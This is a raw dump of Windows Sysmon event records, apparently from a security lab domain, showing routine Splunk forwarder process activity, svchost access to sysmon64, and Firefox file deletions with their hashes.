09:18:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C74-6151-657A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.644{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C74-6151-657A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:44.623{5EBD8912-8C74-6151-657A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:41.934{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53480-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:45.616{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FB5C01E15ECA7ACBC1EDEB96057E2B5,SHA256=54174A3130F803F51014D32E323F15D9A505422524AE3233549B9E1C64685F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.689{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19AF35037CACE50034B15292C6D74005,SHA256=37D495F5C5ADD4C0FE261A977A5DF735F946EE03F13AFD15303B79E8A4646ED0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C75-6151-667A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8C75-6151-667A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.343{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C75-6151-667A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:45.337{5EBD8912-8C75-6151-667A-00000000FC01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:46.647{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D30978EE775DA4DFE2117326FBD405C6,SHA256=55BAF083D3F759F973B1FB02D6B2F9563E7DE555103995547D1777E61EA36B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.742{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=1C6052455FE2E4266E8A861FED92BC37,SHA256=D740B4F3036CF52857F8D70DA588DD1C38470EEEE7CC839A264D932F5B410823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.742{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=6B8AC1776EA68461B67C18A0795C26F0,SHA256=DF6F5891323A34F808821401CCA6C86970C6CCD1036D7C2DD8C50DE284DC4E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.741{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=16919FEF710B05AA99D7A683ED1FE5F4,SHA256=2CD10973B15292B28A3C2F0823AB9519A5E01677AF211469465DFE4D5268C96D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.740{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=8F4BB7A7C6F7257DA859344C97DEE94D,SHA256=B172E295E62A07D387C3573D02727E2878FEF05EFA60F5FF9F0BD3DAAE0385E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.739{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=257E37EF1B51FB2DDC57E2263376EEE9,SHA256=D78D2F2F50C20952863254C5F988FE41F625C90F5BD86C052997F8B4F30573C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.738{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=3EA2C08E5E55FCFF462E3B03301CE9B9,SHA256=9A170F36350FE6B7FE94F3C2E5D3C501F10ED538088FE97D37046CB2C2FD08C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.243{5EBD8912-8C76-6151-677A-00000000FC01}65925228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.037{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C76-6151-677A-00000000FC01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8C76-6151-677A-00000000FC01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:46.021{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C76-6151-677A-00000000FC01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 